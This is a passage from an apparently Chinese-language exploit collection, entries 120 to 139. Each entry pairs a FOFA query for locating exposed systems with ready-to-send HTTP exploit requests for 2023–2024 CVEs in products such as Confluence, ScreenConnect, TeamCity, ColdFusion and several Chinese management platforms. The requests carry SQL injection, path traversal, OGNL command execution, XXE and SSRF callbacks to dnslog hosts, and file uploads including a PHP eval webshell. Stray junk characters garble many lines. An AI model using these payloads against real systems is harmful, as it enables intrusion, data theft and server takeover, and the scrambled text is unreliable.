0 A X9 Z- V" @" I0 ~2 j. {7 [X-Remote-Ip: 1.1.1.1$ n0 |% b: f2 q
X-Remote-Addr: 1.1.1.1
+ p. N/ J' B' G* O- y6 R( }Te: trailers
# M4 l0 g& Y- W4 f* [3 D% O3 rConnection: close
3 `) C ~& `4 E# i. H0 o9 S
K+ V# y9 |1 }2 Gsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|1234561 R I& G) e2 g' ]- r* a" K; Z: A
' G) v$ f8 Z2 ~; ^$ a: G/ h; \( \
9 _% h" ^ b0 v1 E/ A
120. 北京百绰智能S40管理平台导入web.php任意文件上传
. }8 a; E/ t9 ]5 U4 SCVE-2024-12537 M1 s+ n& O5 ?( l: ]
FOFA:title="Smart管理平台"* M2 K3 U& }5 r
POST /useratte/web.php? HTTP/1.1' r& W& n& _4 T& _/ j3 V
Host: ip:port
; t5 v- C- E- V; ]) o5 c4 H7 _Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db1 f* V6 ^, l$ n0 [0 [
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko8 L+ o' w2 |% @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 L, j7 A1 ~2 R! M6 l& [) A' Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! X( a: W5 j* u0 {, k, I
Accept-Encoding: gzip, deflate
" u* G! H* R" F7 HContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328( x9 J; l2 u$ n* O5 W
Content-Length: 5971 \, K1 u# R" E
Origin: https://ip:port
# g- l9 d+ m( `3 j, jReferer: https://ip:port/sysmanage/licence.php
( ]* F" c7 b) q/ j0 `; p+ _7 c( jUpgrade-Insecure-Requests: 1
1 A0 n H* x5 C: a' S4 Z( Y SSec-Fetch-Dest: document
8 @. `" t- h4 T SSec-Fetch-Mode: navigate2 J( E. r, i9 B8 K4 n1 n- m- ~* ?
Sec-Fetch-Site: same-origin* l# \0 C1 k4 h4 r
Sec-Fetch-User: ?1
P4 K% k0 C( Q% Q- @' BTe: trailers' s1 W! t) @; R( H
Connection: close
1 G9 ~5 R+ h6 s. X; S0 _1 g' N4 ]0 E- R3 X
-----------------------------42328904123665875270630079328
0 y3 L3 B% ?) v: m/ ?, ~# XContent-Disposition: form-data; name="file_upload"; filename="2.php"
8 D' U! {! f, OContent-Type: application/octet-stream: `8 ?4 [) }+ V$ @
: C5 A6 n t8 [ q2 c<?php phpinfo()?>. h( o! E: P$ b
-----------------------------42328904123665875270630079328
' a _* \9 i- s" b. b. M5 [* eContent-Disposition: form-data; name="id_type"9 }1 a& O- N( p
7 p" R: O* P" S$ a% n. B% p
1
; F( f2 K2 J9 g; @ `; R% P1 i-----------------------------42328904123665875270630079328
% O# w9 X* T% b) o+ O/ M7 yContent-Disposition: form-data; name="1_ck"% ^" q+ B2 b1 }6 p* s
3 l0 ?$ z3 U% R1_radhttp6 _" ^3 f0 ^4 ~; G2 R
-----------------------------42328904123665875270630079328
" D) q6 A" {2 B7 \4 m- i+ q5 ~& C6 aContent-Disposition: form-data; name="mode"
' u+ O2 n1 D5 u l2 ^; b) u+ p3 r) z' s% s
import7 ?4 N& T! d% [, j1 [
-----------------------------42328904123665875270630079328
1 p% s" J8 u$ L) C
7 k( g% ?; `1 s- Z4 j% X+ @5 Z( h r4 L( ^+ L
文件路径/upload/2.php
# c- }! e, Z3 @( O- {) h9 Z8 W$ p9 |* D+ z& f& h
121. 北京百绰智能S42管理平台userattestation.php任意文件上传/ u/ W. h4 e$ X# }2 d/ T, n
CVE-2024-1918
. P* I/ ^! _" `; v- x' G2 \0 O8 BFOFA:title="Smart管理平台"8 X/ n, w0 x9 W- O) U
POST /useratte/userattestation.php HTTP/1.1! ?9 X9 |# ~* l1 w9 O: g
Host: 192.168.40.130:84431 O& n5 B8 b3 a- D4 Z' B. W4 o
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
# G2 Y7 O5 ?4 XUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
/ i( k7 S1 ~: c( n+ Y6 y) _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. O! v& n0 y4 L# [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 l9 Y7 x O$ y
Accept-Encoding: gzip, deflate
: C) F( A, W2 l/ kContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
, N6 T- `. i1 h- [0 IContent-Length: 5929 P1 F( r0 @" i4 H- F" t
Origin: https://192.168.40.130:8443
4 Q* c7 }% f. d4 J/ K" ]Upgrade-Insecure-Requests: 1
1 r! d: S( r. z- @6 bSec-Fetch-Dest: document
; o/ v* x2 Y5 L* r8 wSec-Fetch-Mode: navigate
5 y1 P' Q- H. ~2 ?" DSec-Fetch-Site: same-origin
m9 a8 k) X2 wSec-Fetch-User: ?16 D$ W! c% L* b4 S8 l5 d. S' {
Te: trailers
- c* y9 Y1 J3 G* d2 H9 O& FConnection: close5 H* P4 e7 y. ^; C3 v: r. J
8 j7 w. U- A: c5 c: a
-----------------------------42328904123665875270630079328
6 g8 ^& m: b4 W0 F6 CContent-Disposition: form-data; name="web_img"; filename="1.php"0 q' {4 a- ?) ^) B5 H: o F: C
Content-Type: application/octet-stream3 S; T! C$ _% a1 W5 [( q' J
1 `' H' k! W! x( I+ e<?php phpinfo();?>
6 f1 D, }8 i3 o, a: ?-----------------------------42328904123665875270630079328
3 H* `( t0 m) B$ S+ Y( w- R3 k2 A& nContent-Disposition: form-data; name="id_type"
2 k" R) J3 U% [' b; h2 b( T8 w/ H! m/ {1 a- f6 Q( E( e$ E
1
: Y1 T* O$ k6 {; w5 W' [! }$ f-----------------------------42328904123665875270630079328
' w" K" L# Q0 S+ E ? b* xContent-Disposition: form-data; name="1_ck"- X, g% H9 z2 ?2 T4 f
+ q1 Q I7 t! D7 M* b; ]: a: s
1_radhttp
+ }0 S/ q$ I A-----------------------------42328904123665875270630079328: l+ w2 p% f" p! d* R9 k& D$ t
Content-Disposition: form-data; name="hidwel"
# k7 P0 H" L9 S" @, A) `. i1 M! k3 N5 ~6 }4 o1 o
set: r- w* H7 ?# M. `# d* s
-----------------------------42328904123665875270630079328
3 i$ k4 U2 C* L$ c/ ^3 P
) \- m- q- A7 @' j$ g5 G
; ]1 s$ T: _( V$ H5 lboot/web/upload/weblogo/1.php
9 N7 V; r$ ~* h+ w: H/ [/ t4 {: s" Y6 V$ ?
122. 北京百绰智能s200管理平台/importexport.php sql注入0 e. [. O% v2 E: A1 N. n+ N" P
CVE-2024-27718FOFA:title="Smart管理平台"' ] [! m# P3 @& g& Z2 J2 r( N
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()( p& V* ?/ u* N1 Q' L% x
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1& Q/ y I4 ]* O
Host: x.x.x.x+ b' z( R1 r; o0 f
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
% b6 b9 ?9 a/ D% q) f) _7 x0 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
; h( k# Y9 B9 H7 Q9 |. cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' v* b/ K* L% Z, c ]0 H6 n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Y- h& @1 [0 H) q: j6 I2 X: uAccept-Encoding: gzip, deflate, br
5 z. m& b! k& E9 s8 }Upgrade-Insecure-Requests: 14 {% b: c* q6 O% x& Y
Sec-Fetch-Dest: document! n3 Y$ n' ?/ }2 G' H b6 q6 M
Sec-Fetch-Mode: navigate# S8 P9 i" j) w: l1 P
Sec-Fetch-Site: none
5 ^: [) \' r- N9 r `$ `0 SSec-Fetch-User: ?1
6 b+ W; l+ l& p( F# |! gTe: trailers/ J( j9 t0 f' k& U: [
Connection: close
3 T# F- k+ u8 ^( h
% \7 x8 @9 {: o5 B$ O% b6 N% E) V+ | b" A3 y$ h9 z! c2 Q2 V
123. Atlassian Confluence 模板注入代码执行9 @" g& @" ]& Z) f
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
$ i" o+ y9 \5 e2 n) r% oPOST /template/aui/text-inline.vm HTTP/1.1* _+ C0 Y! U2 a4 z6 }$ L
Host: localhost:8090" W: [& M, v, \- v2 l8 D+ S
Accept-Encoding: gzip, deflate, br7 I) q7 i1 [' E" u2 {; v. w" W) r
Accept: */*. {' B# o% h# N+ q
Accept-Language: en-US;q=0.9,en;q=0.8
0 B$ b9 a5 q' |4 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
8 d/ |8 F0 S; fConnection: close
3 T) V) T8 R4 ?4 m/ xContent-Type: application/x-www-form-urlencoded" O Z. `5 ]5 C1 G8 U* i; }
e! M" s) `% Q, `4 r/ h
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
, c P+ u, l" t+ t8 v$ V' e
$ O2 Z3 V) H! T# q% S- e5 M, K% E* J6 p! [. a1 b( i$ ~
124. 湖南建研工程质量检测系统任意文件上传" x# U1 p( f# y) I: V
FOFA:body="/Content/Theme/Standard/webSite/login.css"
% g, O# Q% ?& m n7 XPOST /Scripts/admintool?type=updatefile HTTP/1.1
' j) ]0 R( X! ~$ _- V0 ^$ `Host: 192.168.40.130:8282& ^$ c6 Z: O$ u" L. r4 ` ~
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" R; G7 ?7 g" f# T R# D
Content-Length: 72
- _; h: Q9 _; ~( ^7 n5 N7 F. ?+ dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ R0 [; }* _8 u- F, g# p$ DAccept-Encoding: gzip, deflate, br8 W7 x4 x% k. O' h, ?0 `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 S' v D- W: u: U$ IConnection: close+ e/ Q6 l# S" U1 Q- k
Content-Type: application/x-www-form-urlencoded6 \$ w7 Z( u/ C3 K. F1 w6 l
' d+ i, z n4 W( Q, YfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
) T0 `. C7 ]; O/ |. F4 o7 I) b! I" ~' h6 q( d; V0 b ?5 ]
/ D7 C; F" f$ t$ w' rhttp://192.168.40.130:8282/Scripts/abcgcg.aspx
+ t/ p p$ _" ~4 c9 r0 h% J E7 r1 O" t8 I7 B5 J# A) x
125. ConnectWise ScreenConnect身份验证绕过
: b! i/ ?5 R4 j" W: F J: A- D9 ECVE-2024-17097 m x5 S( C. ^7 T- e' ?8 ~* `" E
FOFA:icon_hash="-82958153"
9 x& V6 k# F( f: d% @https://github.com/watchtowrlabs ... bypass-add-user-poc
4 F. n3 [: V1 Y0 u( J8 t1 a
6 v4 _. ~5 q! x
) X( W) I# f+ @7 w1 {$ y# E使用方法
$ @" n& p7 y) D. ~# E8 Hpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
8 x% R3 D: V% A0 H- c7 L* Z3 R
$ R" p+ j. S/ O$ s4 P
0 q; Y8 X* X7 h) j0 X/ h) N创建好用户后直接登录后台,可以执行系统命令。
4 v/ Z2 ~2 k/ y- U( g
+ R- ?. J, w2 s7 N0 q126. Aiohttp 路径遍历
, R, y9 z6 L8 p7 b" dFOFA:title=="ComfyUI"+ [, g8 N) ^4 N
GET /static/../../../../../etc/passwd HTTP/1.1
, c7 W; @% U: f8 h( C% jHost: x.x.x.x7 d3 S& Y& Y/ A& s. G* o7 j3 m; R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
* |- e* g* d/ T- B. @Connection: close5 j0 {3 d1 Y- j
Accept: */*; l9 q! Y" p' l9 Q( n1 F8 W6 `
Accept-Language: en
+ P% ^7 ?0 |- _! J/ w! W) A) _Accept-Encoding: gzip) K4 ~4 R) I9 ~4 |2 Q
$ m5 {" a% |$ j' f- F0 s
9 `% Q |7 k7 ]) h! f127. 广联达Linkworks DataExchange.ashx XXE
% M. G6 \& P3 x [0 W G+ A4 @FOFA:body="Services/Identification/login.ashx" 3 y4 k8 A- {% Q- `9 e
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1' ]# X& X# U& q5 z1 _' N# m8 Y
Host: 192.168.40.130:8888# h$ |; v/ E$ o- ?0 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
$ R' j L7 V j$ \; KContent-Length: 415
4 e t- O5 ^7 }/ T+ wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 _- ], b" ]9 e. j7 b
Accept-Encoding: gzip, deflate/ Q8 p' m. Z/ w# k$ {$ _2 ^
Accept-Language: zh-CN,zh;q=0.9
+ L7 R. y# h. ?, z% |0 aConnection: close
0 |* @& ~8 h! [Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
3 u; Y( Y& S4 }' W( a0 y8 r+ Y7 c nPurpose: prefetch
8 j4 k1 T+ l0 U1 D4 B# \Sec-Purpose: prefetch;prerender
9 O9 F- Q9 Y& s2 ~2 Y/ G- w8 X! e* e( L0 H* i m
------WebKitFormBoundaryJGgV5l5ta05yAIe06 W$ R- \- U& h9 W
Content-Disposition: form-data;name="SystemName"3 S$ p. g: s% t4 l
6 @% n% e2 r1 J, r" D
BIM
2 G) D6 n* [/ E7 M! x0 d; _------WebKitFormBoundaryJGgV5l5ta05yAIe0
" r; p9 _+ q" k7 eContent-Disposition: form-data;name="Params"
/ P2 m7 n8 h# B1 g9 F8 A# W* tContent-Type: text/plain
9 E7 M1 z# w: z6 I2 D
7 |6 s) O9 X1 i2 e; q. E* a<?xml version="1.0" encoding="UTF-8"?>- c( W4 K+ h8 w% t9 E2 ]: N
<!DOCTYPE test [
. G* q: W$ d/ @: {$ @8 O9 [<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
6 D9 ^- l4 P% l) O% z]
. c/ a" D8 e0 z, g: S V>4 A9 O! h- I+ A# E
<test>&t;</test>
% \: [: s3 X X1 U------WebKitFormBoundaryJGgV5l5ta05yAIe0--/ M9 t- m$ i" v0 v8 w6 g K; U
; \- g: x: {: o" z& }: T( `, ^2 @/ Q# ~ T' u4 D4 u% V6 ^8 |
6 `/ f1 a5 X0 g) x. g( }
128. Adobe ColdFusion 反序列化
1 a- n2 O. y& U' G4 NCVE-2023-38203
4 f: {" R) |# _Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
: X a, c% w" jFOFA:app="Adobe-ColdFusion"
2 v; W" y/ L; {9 B# P8 }4 lPAYLOAD
6 U1 ]. f# w' t0 I
4 l( I: I$ O% |' u129. Adobe ColdFusion 任意文件读取2 B& U" |) ~ Q9 a3 _+ m; u
CVE-2024-20767. T! w- ]& r/ y# _
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request", I6 x8 Z' P' r4 g* R
第一步,获取uuid
2 x% d4 S) I( w" R' GGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
O' @2 T/ T/ U( FHost: x.x.x.x
' E: p* J2 i: _' U' j8 ]# HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36% a/ W1 x& L9 j9 y5 b$ m
Accept: */*
2 e. Z) N7 C$ X5 ^: x# l. z# eAccept-Encoding: gzip, deflate4 M* {& J7 ]6 `& [: p7 g
Connection: close. n2 T. |3 h" `# v/ r" D9 B' {1 w1 n
$ Z+ y+ T' O7 v3 Z: k; H/ ~! u/ G
第二步,读取/etc/passwd文件7 b, c- R7 X( l$ l
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
$ r8 M% W6 V, |4 E5 AHost: x.x.x.x
3 f" _$ ]& O! {8 \- t: hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.361 c& A1 H) p, m* U
Accept: */*
8 o+ r; f; B/ v C& `Accept-Encoding: gzip, deflate6 B% f5 Q3 G# w9 N
Connection: close
3 R, _% I5 {0 _& _4 t2 ]0 Juuid: 85f60018-a654-4410-a783-f81cbd5000b9, n8 L3 M! t1 F; J/ F8 P1 ~
3 }2 ^! ?" r; O* b$ f
- j, U. |9 _6 J3 B5 X: h
130. Laykefu客服系统任意文件上传
* K+ p/ [. p( d/ O; X# m& G9 qFOFA:icon_hash="-334624619"7 Y( F' }) Q! J# q' h4 Q
POST /admin/users/upavatar.html HTTP/1.1* G6 M/ W6 p8 D' B/ h y
Host: 127.0.0.1' U5 B7 N9 z. }% a
Accept: application/json, text/javascript, */*; q=0.01
. U w6 ~ S, c, |4 B" y# }8 \X-Requested-With: XMLHttpRequest
& }& u) i# R2 HUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26! Q7 m+ S! \3 l( Z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR; j/ D2 W: O3 r# L
Accept-Encoding: gzip, deflate& K: K7 n. m0 U; P& a
Accept-Language: zh-CN,zh;q=0.9' U$ o; C& n: l5 X; }
Cookie: user_name=1; user_id=3
1 ~) z( g7 d8 h7 H) y* t0 E, HConnection: close
_* b$ d" K0 z) c6 @' }2 y5 ^0 {+ s( q) {5 }
------WebKitFormBoundary3OCVBiwBVsNuB2kR
- i# l! h0 u4 C6 @" N: l8 fContent-Disposition: form-data; name="file"; filename="1.php"3 l; l8 G5 Q: W
Content-Type: image/png
3 q2 P/ }5 F. x; y' } ) M9 ]# w3 Y( L o/ W+ k; r4 S
<?php phpinfo();@eval($_POST['sec']);?>
$ j6 R+ J- \ H4 b! `" D------WebKitFormBoundary3OCVBiwBVsNuB2kR--' F1 }' x/ A4 H
* r# [- s; U4 r
% v5 D6 [" d' h+ H# U/ V# o6 H
131. Mini-Tmall <=20231017 SQL注入
. @7 p2 j v% J9 G: }4 YFOFA:icon_hash="-2087517259"4 g3 L# k2 L8 }3 `0 O; ]
后台地址:http://localhost:8080/tmall/admin5 s/ u, H7 F/ q3 V
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)3 [* K. G9 K- k$ v* L
3 C: A; y) |6 o" p6 j1 [132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过 w1 X- j1 z; J5 c2 G
CVE-2024-27198
/ @! R) X+ V# B. ^- m# hFOFA:body="Log in to TeamCity"9 a1 O, Q9 f0 n6 w
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1* ?3 Q9 R O- a, \- U! D% h) N5 t
Host: 192.168.40.130:8111
) M2 F" y% |' ?3 I1 K fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
* r i1 ]6 Q& x+ i% FAccept: */*2 U+ v% s" s7 V( p
Content-Type: application/json7 o+ _# L2 R3 W' |6 H1 u6 `/ m: U
Accept-Encoding: gzip, deflate
2 n0 Z# T. y# [6 y \" s4 G# I' T% N/ T$ w
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
$ e8 {# P, F+ U3 o1 C R) @$ u1 M% F0 L- f7 P7 u L$ n
4 V8 g! }) a; @- u0 \8 sCVE-2024-27199
}6 p- N- I7 J2 C7 E1 Q; O3 f. R/res/../admin/diagnostic.jsp
/ ^1 E# r8 `1 k$ |9 u5 D/.well-known/acme-challenge/../../admin/diagnostic.jsp
4 M6 L! [) E! @/update/../admin/diagnostic.jsp
# S' j2 ~ |9 ^# i
! W$ X+ q1 o% V* Q. f# e- Q2 @& E0 i; M4 h9 \) t& Y
CVE-2024-27198-RCE.py9 Q; s. z! Y% I9 K
. e! j8 b) n) x
133. H5 云商城 file.php 文件上传- k, I: l& H9 D4 }9 n7 |
FOFA:body="/public/qbsp.php"
$ Y) a* G4 `! JPOST /admin/commodtiy/file.php?upload=1 HTTP/1.12 t, o: I( x3 o5 }
Host: your-ip
# G* ~" Y$ O2 O0 E8 E1 K$ x( qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
. C. t+ [2 C* P8 f' P' CContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
/ `: S/ m; x* a+ `) E/ y- Z
* ]$ C- u$ {% v9 F5 n' [& J------WebKitFormBoundaryFQqYtrIWb8iBxUCx5 D R a& F1 O7 Z' o
Content-Disposition: form-data; name="file"; filename="rce.php"2 r; ]5 F) Q6 [1 _9 r) K
Content-Type: application/octet-stream. F5 j+ O( L6 K- H" M) s
: f: r- c5 x% p6 A# ?9 D9 \
<?php system("cat /etc/passwd");unlink(__FILE__);?>
* v6 w- e1 U; s------WebKitFormBoundaryFQqYtrIWb8iBxUCx--$ C* H: S' E- u, K& j
@- X, E1 |# @- c5 L1 ^5 _: _
0 ?7 L" \ j& n @, p% `- w3 w! g) B$ M0 b2 t
134. 网康NS-ASG应用安全网关index.php sql注入
! ]6 t/ V0 N7 F( u7 QCVE-2024-2330
+ Z6 u7 N) w/ v# J0 |4 CNetentsec NS-ASG Application Security Gateway 6.3版本
2 N* x0 F; g9 [% }5 ]& G" aFOFA:app="网康科技-NS-ASG安全网关"
. s L0 P. K/ Z5 `POST /protocol/index.php HTTP/1.18 \7 u& \8 P/ Y, X! i- ~. K6 q8 v
Host: x.x.x.x" h( k# T. U1 s8 L9 K
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de& h8 |8 T1 v- k% [: i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.03 [$ W$ ?) `8 o$ M
Accept: */*' f$ D7 v. o1 X3 h9 A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( R/ Q+ G/ ?2 X/ MAccept-Encoding: gzip, deflate
' Y" O2 Z1 J" y6 s" g/ S, `. _Sec-Fetch-Dest: empty
4 s/ [! R6 i# H: x: e9 bSec-Fetch-Mode: cors2 P) V0 D a: y" z+ ^
Sec-Fetch-Site: same-origin7 b4 P0 [: [5 n4 s
Te: trailers7 j8 _% Z p: j8 g" K
Connection: close% V/ s# Y% T' z3 m4 W. B- V
Content-Type: application/x-www-form-urlencoded
7 e* m# e7 l+ d0 T' X+ T" @Content-Length: 2637 I3 R! I2 a$ @! \+ }
, O; z5 e7 N( g; _7 Q% w
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
) b9 T5 V4 m) j) m. S; W& l k: L0 K* h5 G& d* l8 H
S$ k% X! ?! \1 k- G
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入+ p9 q- G3 O7 A3 j$ d/ H
CVE-2024-2022% ~7 p- ?2 J( A, p* a
Netentsec NS-ASG Application Security Gateway 6.3版本6 i: R" W5 }, i% g
FOFA:app="网康科技-NS-ASG安全网关"
" B$ e, j) a8 [, {8 xGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
c7 K4 Z4 o1 THost: x.x.x.x
5 q% i0 N. Z) q0 b3 E# d$ |- YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.360 [! x* ^# i* w/ c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 k+ D1 D- w; U+ E1 F _
Accept-Encoding: gzip, deflate/ M, I1 U' O, U! q2 P) R: F. c
Accept-Language: zh-CN,zh;q=0.9
2 F& j1 k# M% X# U. xConnection: close* d' O( q* n' _& t' w
1 G* @( P2 H* I8 M" X. c/ j: m4 \/ r# h: M
136. NextChat cors SSRF
8 c3 @) P7 L1 i9 DCVE-2023-49785- e6 F7 d, ], @. G0 g# D$ \' B
FOFA:title="NextChat"
$ S, t, Q' }& |* q( y# z* ^GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1/ ]- _9 J. ]( \: b) M6 a! V
Host: x.x.x.x:100007 W4 p! R# X) m Q5 Z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.360 J0 y1 d0 u! d- X3 d8 b3 ?
Connection: close, t# C0 d p( M# E- ^
Accept: */*$ p2 t9 @. I4 V8 O2 @8 l
Accept-Language: en
: M* U Q$ P% t; e, S6 tAccept-Encoding: gzip5 j* {2 i+ `, H l5 M' D
( m8 d+ |# B* L% b
3 ]+ Q7 g1 S" X& q6 T# a: W137. 福建科立迅通信指挥调度平台down_file.php sql注入4 Q# y5 r) r/ `) x. ]( c5 y
CVE-2024-2620
* P( q: C h: F& m4 N+ V3 OFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
e1 ^$ \: f" I8 v4 C; }GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
/ ?" V1 C4 [" c j5 k5 k$ zHost: x.x.x.x: T1 p) P+ r( a" a8 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
; h! {7 D$ N2 h7 g4 TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& G( G- H$ n5 \/ l7 u+ xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- t. S- G# T" r. N7 d3 A" {
Accept-Encoding: gzip, deflate, br8 C8 ^% J, e6 ]9 [0 ]
Connection: close
4 ^" g1 [8 r" O* F, P9 }" m) ZCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj1 L ^& c# r/ S$ v c5 f
Upgrade-Insecure-Requests: 1
% o* _( }0 `* W; \# d3 |
' i/ F9 P$ h# Y: F
% m v4 r' H/ }" B8 ^# H138. 福建科立讯通信指挥调度平台pwd_update.php sql注入% j; { |# X8 l" F, B2 o
CVE-2024-2621
9 r, E& O& I& }" F2 @FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"6 m+ [! P6 |8 L% f
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.12 {/ }" s" G- o# x1 W! ]/ Q
Host: x.x.x.x
0 s ^4 [3 v4 g* S/ z" a/ ]# d1 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
\$ O, \$ v. JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( |) j* J3 s/ T EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 z$ T9 e+ Y: _; C0 m. w! Z
Accept-Encoding: gzip, deflate, br
A( A7 H+ d, MConnection: close$ c x5 y4 [# A2 f2 h$ }% e+ e
Upgrade-Insecure-Requests: 1
! c0 ~: ^" C( `7 G8 `/ F R7 K2 c) U& p
2 l" ^' Q9 K0 ^3 l" e- a# a* W& o
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
( |4 X7 @- P. x6 x2 O# r5 H# a" BCVE-2024-2622
